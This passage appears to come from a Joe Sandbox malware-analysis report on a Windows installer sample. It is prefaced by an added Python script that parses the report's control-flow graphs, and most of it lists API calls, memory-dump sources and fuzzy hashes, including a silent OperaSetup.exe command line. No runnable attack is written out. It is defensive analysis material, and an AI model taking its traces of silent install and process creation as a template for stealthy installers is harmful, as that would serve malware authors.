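The control_flow_graph lines above are the text export of the rendered graphs: each `<id> <start>-<end>` token pair declares a basic block, an API name following a block annotates it, and each `<src>-><dst>` token is an edge. The Python parser below is an added example, not part of the Joe Sandbox report or its tooling. It reads two of the graphs printed above (the entries at 0x4073f6 and 0x406c11, copied verbatim into the two constants) and shows what can be recovered without the image: the single entry and exit block of each graph, the GlobalAlloc/GlobalFree call sites reachable from the entry, the self-looping block at 0x406ce9, and the set of basic blocks the two graphs have in common. The token grammar is inferred from the lines on this page, and the constant and function names are the example's own.

```python
"""Parse Joe Sandbox control_flow_graph edge lists and compare two of them (added example)."""
import re
from collections import deque
from dataclasses import dataclass, field

# Token grammar inferred from the report's control_flow_graph lines (whitespace separated):
#   <node-id> <hex-addr>[-<hex-addr>] [<ApiName> ...]   declares one basic block
#   <src-id>-><dst-id>                                  declares one edge
ADDR_RE = re.compile(r"[0-9a-f]+(?:-[0-9a-f]+)?")


@dataclass
class Block:
    node: int
    start: int
    end: int
    apis: list = field(default_factory=list)


def parse_cfg(text):
    """Return ({node_id: Block}, [(src, dst), ...]) for one control_flow_graph line."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                                   # edge
            src, dst = tok.split("->", 1)
            edges.append((int(src), int(dst)))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.fullmatch(tokens[i + 1]):
            lo, _, hi = tokens[i + 1].partition("-")      # block declaration
            start = int(lo, 16)
            current = blocks[int(tok)] = Block(int(tok), start, int(hi, 16) if hi else start)
            i += 2
        else:                                             # API name on the last block
            if current is None:
                raise ValueError(f"API token {tok!r} before any block declaration")
            current.apis.append(tok)
            i += 1
    return blocks, edges


def entries_and_exits(blocks, edges):
    """Block ids with no incoming edge (entries) and no outgoing edge (exits)."""
    has_in, has_out = {d for _, d in edges}, {s for s, _ in edges}
    return (sorted(n for n in blocks if n not in has_in),
            sorted(n for n in blocks if n not in has_out))


def reachable_apis(blocks, edges, start):
    """{api: sorted block start addresses} over every block reachable from `start`."""
    succ = {}
    for s, d in edges:
        succ.setdefault(s, []).append(d)
    seen, todo, found = {start}, deque([start]), {}
    while todo:
        n = todo.popleft()
        for api in blocks[n].apis:
            found.setdefault(api, []).append(blocks[n].start)
        for m in succ.get(n, []):
            if m not in seen:
                seen.add(m)
                todo.append(m)
    return {api: sorted(a) for api, a in found.items()}


def self_loops(blocks, edges):
    """Address ranges of blocks that branch back to themselves (tight loops)."""
    return sorted((blocks[s].start, blocks[s].end) for s, d in edges if s == d)


def shared_blocks(a, b):
    """Basic-block address ranges declared in both graphs."""
    return sorted({(x.start, x.end) for x in a.values()} & {(y.start, y.end) for y in b.values()})


# Sample input: two control_flow_graph lines copied from this report (the graphs whose
# first block starts at 0x4073f6 and at 0x406c11), with the leading prefix token dropped.
CFG_4073F6 = """
636 4073f6-4073fa 637 40741c-407429 636->637 638 4073fc-4074fe 636->638 639 40742c-407441 637->639 648 407528-40752c 638->648 642 407443-407459 639->642 643 40745b-407471 639->643 645 407474-40747b 642->645 643->645 646 4074a2 645->646 647 40747d-407481 645->647
653 4074a8-4074ae 646->653 649 407630-40763a 647->649 650 407487-40749f 647->650 651 40758c-40759f 648->651 652 40752e-40754f 648->652 657 407646-407659 649->657 650->646 651->653 654 407551-407566 652->654 655 407568-40757b 652->655 658 406c53 653->658 659 40765b 653->659
660 40757e-407585 654->660 655->660 661 40765e-407662 657->661 662 406c5a-406c5e 658->662 663 406d9a-406dbb 658->663 664 406cff-406d03 658->664 665 406d6f-406d73 658->665 659->661 666 407525 660->666 667 407587 660->667 662->657 668 406c64-406c71 662->668 663->639
672 406d09-406d22 664->672 673 4075af-4075b9 664->673 669 406d79-406d8d 665->669 670 4075be-4075c8 665->670 666->648 677 40750a-407522 667->677 678 40763c 667->678 668->659 675 406c77-406cbd 668->675 676 406d90-406d98 669->676 670->657 674 406d25-406d29 672->674 673->657 674->664
679 406d2b-406d31 674->679 680 406ce5-406ce7 675->680 681 406cbf-406cc3 675->681 676->663 676->665 677->666 678->657 682 406d33-406d3a 679->682 683 406d5b-406d6d 679->683 686 406cf5-406cfd 680->686 687 406ce9-406cf3 680->687 684 406cc5-406cc8 GlobalFree 681->684
685 406cce-406cdc GlobalAlloc 681->685 688 406d45-406d55 GlobalAlloc 682->688 689 406d3c-406d3f GlobalFree 682->689 683->676 684->685 685->659 690 406ce2 685->690 686->674 687->686 687->687 688->659 688->683 689->688 690->680
"""
CFG_406C11 = """
738 406c11-406c34 739 406c36-406c39 738->739 740 406c3e-406c41 738->740 741 40765e-407662 739->741 742 406c44-406c4d 740->742 743 406c53 742->743 744 40765b 742->744 745 406c5a-406c5e 743->745 746 406d9a-407441 743->746 747 406cff-406d03 743->747 748 406d6f-406d73 743->748
744->741 749 406c64-406c71 745->749 750 407646-407659 745->750 759 407443-407459 746->759 760 40745b-407471 746->760 754 406d09-406d22 747->754 755 4075af-4075b9 747->755 751 406d79-406d8d 748->751 752 4075be-4075c8 748->752 749->744 757 406c77-406cbd 749->757 750->741
758 406d90-406d98 751->758 752->750 756 406d25-406d29 754->756 755->750 756->747 761 406d2b-406d31 756->761 762 406ce5-406ce7 757->762 763 406cbf-406cc3 757->763 758->746 758->748 764 407474-40747b 759->764 760->764 767 406d33-406d3a 761->767 768 406d5b-406d6d 761->768
771 406cf5-406cfd 762->771 772 406ce9-406cf3 762->772 769 406cc5-406cc8 GlobalFree 763->769 770 406cce-406cdc GlobalAlloc 763->770 765 4074a2-4074ae 764->765 766 40747d-407481 764->766 765->742 773 407630-40763a 766->773 774 407487-40749f 766->774
776 406d45-406d55 GlobalAlloc 767->776 777 406d3c-406d3f GlobalFree 767->777 768->758 769->770 770->744 778 406ce2 770->778 771->756 772->771 772->772 773->750 774->765 776->744 776->768 777->776 778->762
"""

if __name__ == "__main__":
    g1, g2 = parse_cfg(CFG_4073F6), parse_cfg(CFG_406C11)
    for name, (blocks, edges) in (("4073f6", g1), ("406c11", g2)):
        ents, exits = entries_and_exits(blocks, edges)
        print(name, "entry", [hex(blocks[n].start) for n in ents], "exit", [hex(blocks[n].start) for n in exits],
              "loops", [hex(s) for s, _ in self_loops(blocks, edges)], reachable_apis(blocks, edges, ents[0]))
    print("basic blocks common to both graphs:", len(shared_blocks(g1[0], g2[0])))
```

Run as a script it prints one summary line per graph. Both graphs resolve to one entry block and one exit block at 0x40765e-0x407662, the same four GlobalAlloc/GlobalFree sites and the same self-looping block, and most of their block ranges coincide; the near-identical instruction fuzzy hashes in the entries above say the same thing. Whether the report is listing separate functions or one routine reached from several entry points is exactly the question this makes mechanical instead of something to eyeball in the edge lists.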
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
• Instruction ID: eaca5e257ecba6057ed761995cb39389c4d8ec983a179070fe5d03b82c062b57
• Opcode Fuzzy Hash: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
• Instruction Fuzzy Hash: BF713671E04218DBDF28CFA8C884BADBBB1FF44305F14806AD856BB281C7786986DF55
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
• Instruction ID: 26522df2f7fda751442351ae768cbf4c3b612a3e7fb567ef5040218afec9c9a0
• Opcode Fuzzy Hash: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                                                                                                              • Instruction Fuzzy Hash: CB713771D04228DBEF28CF98C8447ADBBB1FF44305F15806AD856B7281C778A946DF45
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402128
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                                                                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 334405425-0
                                                                                                                                              • Opcode ID: bd5665d3c642ef3073feb2242ea4fac62aded45c66893f7ea3efa05918624785
                                                                                                                                              • Instruction ID: ce338c56279ea8fe8b79aec8352296299df23ba62fb37657eb23f857ac8d175a
                                                                                                                                              • Opcode Fuzzy Hash: bd5665d3c642ef3073feb2242ea4fac62aded45c66893f7ea3efa05918624785
                                                                                                                                              • Instruction Fuzzy Hash: 9721D431900104EADF10AFA5CF89A9E7A71BF54355F30413BF501B91E5CBBD89829A2E
                                                                                                                                              APIs
                                                                                                                                              • GlobalFree.KERNELBASE(050F3928), ref: 00401C30
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00004004), ref: 00401C42
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                              • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
                                                                                                                                              • API String ID: 3394109436-1546330588
                                                                                                                                              • Opcode ID: 5a5a1ee5ed13d0feaabbf874524b486d37df7d8f4895048c82ffb873ba65e8fb
                                                                                                                                              • Instruction ID: 411326a6bd5adc799c7b4966fae4248b5e735fb78bdcb674ef76145c70810545
                                                                                                                                              • Opcode Fuzzy Hash: 5a5a1ee5ed13d0feaabbf874524b486d37df7d8f4895048c82ffb873ba65e8fb
                                                                                                                                              • Instruction Fuzzy Hash: 7D210572A04150ABEB20EFA5DD9599E73A8AF14314714483FFA52F36D0C67C9C908B1D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040616D: GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
                                                                                                                                                • Part of subcall function 0040616D: SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D81
                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D89
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1655745494-0
                                                                                                                                              • Opcode ID: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
                                                                                                                                              • Instruction ID: 230036c29a26c5c6c0f0d9698206584c8b05a9663c1b6bdb31d330f7893cafd1
                                                                                                                                              • Opcode Fuzzy Hash: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
                                                                                                                                              • Instruction Fuzzy Hash: A6E065312156915AC35057759E0CA6B2A98DFC6724F15893BF892F11D0CB7C884A8A6D
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNEL32(00008001,00000000,00000000,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004033BB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                              • Opcode ID: 8ae365655b7597d869b3b2f56841766425f6863b3c44559cbc89e4a26d302e34
                                                                                                                                              • Instruction ID: 1ca1e87bffa477aecce4b8809d13608721b46e5c52e0656af2305a29f618206d
                                                                                                                                              • Opcode Fuzzy Hash: 8ae365655b7597d869b3b2f56841766425f6863b3c44559cbc89e4a26d302e34
                                                                                                                                              • Instruction Fuzzy Hash: E9317F30504219BBDB12DF55EE85A9E3FA8EB00359F10443BF905FA190D2788A509BA9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0,004BD000), ref: 0040602A
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                                                                                                                • Part of subcall function 00405BF6: CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,004C5000,?,00000000,000000F0), ref: 00401672
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1892508949-0
                                                                                                                                              • Opcode ID: 95a4860431ad72eda60d3769fb9d39a986bc9f4f4600bed416f8c382693ae343
                                                                                                                                              • Instruction ID: 984bc8847ab7730807188d0ae4260eaffd58af59862b83f9ec54611d8a9cde38
                                                                                                                                              • Opcode Fuzzy Hash: 95a4860431ad72eda60d3769fb9d39a986bc9f4f4600bed416f8c382693ae343
                                                                                                                                              • Instruction Fuzzy Hash: 0B11C431504514EBDF20AFA5CD4169F36A0EF14368B29493FF942B22F1D63E8981DA5E
                                                                                                                                              APIs
• RegQueryValueExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
• RegCloseKey.ADVAPI32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID: CloseQueryValue
• String ID:
• API String ID: 3356406503-0
• Opcode ID: 1afaa0eb68ef52f167e8a4d151f2c3bf02fb3977f39619ee02b743959e6b5f4c
• Instruction ID: 1ca5a891072309ee4d57d6c386aa99eedf8583e79045272cabd10b8210a2a1fd
• Opcode Fuzzy Hash: 1afaa0eb68ef52f167e8a4d151f2c3bf02fb3977f39619ee02b743959e6b5f4c
• Instruction Fuzzy Hash: 3311C171904206EADF15DFA0DA585AE7774FF04348F20443FE802B62D0D3B84A41DB5D
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
• Instruction ID: 79785e1055596f35c81cc11ac1c08ebc052ec65b95c8641ce566291046e0593e
• Opcode Fuzzy Hash: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
• Instruction Fuzzy Hash: C10144316202109BEB091B799D04B2B3398E750754F20427FF841F32F0E6B8CC028B4E
APIs
• CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
• GetLastError.KERNEL32 ref: 00405C46
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
• Instruction ID: 25e10c4fac4d698a59efea960107f93253b8ac9e3b964bd1d6400c706bcc644c
• Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
• Instruction Fuzzy Hash: E6F0F4B0C04209DAEB00CFA4D9497EFBBB4BB04319F00802AD541B6281D7B882488FA9
APIs
• CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
• CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
Similarity
• API ID: CloseCreateHandleProcess
• String ID:
• API String ID: 3712363035-0
• Opcode ID: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
• Instruction ID: 678fb2cce29b027916b6e9c77d741f72fc3b9667aac1924bad6fa13dfa27649e
• Opcode Fuzzy Hash: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
• Instruction Fuzzy Hash: E6E0BFB4500209BFFB009B64ED49F7B7B7CE704605F008525BD10F2191D774D8159A7D
APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
• GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
  • Part of subcall function 00406A26: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
  • Part of subcall function 00406A26: wsprintfW.USER32 ref: 00406A78
  • Part of subcall function 00406A26: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
• Instruction ID: 6883b19bcb958afdb132cd43d0a9aeb12fc85c99e1cf53eaa24744f9dd55f8c1
• Opcode Fuzzy Hash: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
• Instruction Fuzzy Hash: CDE08636714611ABD210BA745E48C6777A89F86610306C83EF542F2141D734DC33AA79
APIs
• FreeLibrary.KERNEL32(?,76F93420,00000000,76F92EE0,00403CB6,004D1000,00403BB5,?,?,00000008,0000000A,0000000C), ref: 00403CF9
• GlobalFree.KERNEL32(00000000), ref: 00403D00
Similarity
• API ID: Free$GlobalLibrary
• String ID:
• API String ID: 1100898210-0
• Opcode ID: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
• Instruction ID: 6cc7235c82e409e594193dc40a4abc0356c386f753d5776fe34d96f63476a0b8
• Opcode Fuzzy Hash: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
• Instruction Fuzzy Hash: 2DE012334151305BD6225F59FE0575ABB68BF45F22F05C52FE940BB2A18BB85C424FD8
APIs
• GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
• CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
• Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
• Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
• Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
APIs
• GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
• GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C64
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
